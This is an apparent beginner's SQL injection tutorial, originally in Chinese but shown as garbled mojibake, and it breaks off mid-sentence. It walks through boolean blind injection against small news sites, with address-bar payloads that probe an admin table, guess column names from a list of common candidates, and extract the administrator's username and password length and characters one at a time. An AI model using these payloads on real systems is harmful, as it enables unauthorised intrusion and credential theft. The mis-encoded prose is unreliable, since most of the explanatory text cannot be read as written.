²ËÄñѧϰSQL×¢Éä

 Ò»°ã¹úÄÚµÄСһµãµÄÐÂÎÅÕ¾µã³ÌÐò ¶¼ÓÐ ""&request ÕâÖÖ©¶´£¬ÏÂÃæÎÒ½²½â¹¥»÷·½·¨
ÔÚµØÖ·À¸£º
and 1=1
²é¿´Â©¶´ÊÇ·ñ´æÔÚ,Èç¹û´æÔÚ¾ÍÕý³£·µ»Ø¸ÃÒ³,Èç¹ûûÓÐ,ÔòÏÔʾ´íÎ󣬼ÌÐø¼ÙÉèÕâ¸öÕ¾µÄÊý¾Ý¿â´æÔÚÒ»¸öadmin±í
ÔÚµØÖ·À¸£º
and 0<>(select count(*) from admin)
·µ»ØÒ³Õý³£,¼ÙÉè³ÉÁ¢ÁË¡£
ÏÂÃæÀ´²Â²Â¿´Ò»Ï¹ÜÀíÔ±±íÀïÃæÓм¸¸ö¹ÜÀíÔ±ID£º
and 1<(select count(*) from admin)
Ò³Ãæʲô¶¼Ã»ÓС£¹ÜÀíÔ±µÄÊýÁ¿µÈÓÚ»òÕßСÓÚ1¸ö
and 1=(select count(*) from admin)
ÊäÈë=1ûÏÔʾ´íÎó£¬ËµÃ÷´ËÕ¾µãÖ»ÓÐÒ»¸ö¹ÜÀíÔ±¡£
ÏÂÃæ¾ÍÊÇÒª¼ÌÐø²Â²âadmin ÀïÃæ¹ØÓÚ¹ÜÀíÔ±Óû§ÃûºÍÃÜÂëµÄ×Ö¶ÎÃû³Æ¡£
and 1=(select count(*) from admin where len(username)>0)
²Â½â´íÎó!²»´æÔÚ username Õâ¸ö×ֶΡ£Ö»ÒªÒ»Ö±¸Ä±äÀ¨ºÅÀïÃæµÄusernameÕâ¸ö×Ö¶Î,ÏÂÃæ¸ø´ó¼Ò¼¸¸ö³£ÓõÄ
user,users,member,members,userlist,memberlist,userinfo,admin,manager,Óû§,yonghu
Óû§Ãû³Æ×ֶβ½âÍê³ÉÖ®ºó¼ÌÐø²Â½âÃÜÂë×Ö¶Î
and 1=(select count(*) from admin where len(password)>0)
password ×ֶδæÔÚ£¡ÒòΪÃÜÂë×Ö¶ÎÒ»°ã¶¼ÊÇÕâ¸öÀ­,Èç¹û²»ÊǾÍÊÔÊÔpassÈç¹û»¹²»ÊǾÍ×Ô¼ºÏëÏë°É
ÎÒÃÇÒѾ­ÖªµÀÁ˹ÜÀíÔ±±íÀïÃæÓÐ3¸ö×ֶΠid,user,password¡£
id 񅧏
user ̞
password ÃÜÂë
ÏÂÃæ¼ÌÐøµÄ¾ÍÊǹÜÀíÔ±Óû§ÃûºÍÃÜÂëµÄ²Â½âÁË¡£Ò»¸öÒ»¸öÀ´,ÓеãÂé·³,×îºÃÕÒ¸ö²Â½â»úÀ´
ÏȲ³ö³¤¶È!
and 1=(select count(*) from admin where len(user)<10)
user ×ֶ㤶ÈСÓÚ10
and 1=(select count(*) from admin where len(user)<5)
user ×ֶγ¤¶È²»Ð¡ÓÚ5
ÂýÂýµÄÀ´,×îºó²Â³ö³¤¶ÈµÈÓÚ6,Çë¿´ÏÂÃæ,·µ»ØÕý³£¾Í˵Ã÷²Â½âÕýÈ·
and 1=(select count(*) from admin where len(user)=6)
ÏÂÃæ²ÂÃÜÂë,
and 1=(select count(*) from admin where len(password)=10)
²Â³öÀ´ÃÜÂë10λ,²»ÒªÆæ¹Ö,ÏÖÔÚÍø¹Ü¶¼ÓзÀ±¸µÄ,ËùÒÔÃÜÂëÉÏ20λҲ²»Ì«Ææ¹ÖÁË
ÏÂÃæ¸Ã×öµÄ¾ÍÊÇ°ÑËûÃDzð¿ªÀ´Ò»¸öÒ»¸ö²Â×Öĸ
and 1=(select count(*) from admin where left(user,1)=a)
·µ»ØÕý³££¬µÚһλ×ÖĸµÈÓÚa,ǧÍò²»Òª°Ñ´óдºÍСд¸ø¸ã´íÁËŶ~~ºÇºÇ,Èç¹û²»a¾Í¼ÌÐø²ÂÆäËûµÄ×Ö·ûÂä,·´Õý²Âµ½·µ»ØÕý³£¾ÍËãOKÁË
¿ªÊ¼²Â½âÕʺŵĵڶþλ×Ö·û¡£
and 1=(select count(*) from admin where left(user,2)=ad)
¾ÍÕâÑùÒ»´Î¼ÓÒ»¸ö×Ö·ûÕâÑù²Â,²Âµ½¹»Äã¸Õ²Å²Â³öÀ´µÄ¶àÉÙλÁ˾ͶÔÁË,ÕʺžÍËã³öÀ´ÁË
¹¤×÷»¹Ã»ÓÐÍê,±ðæ×ÅÅÜÁË,»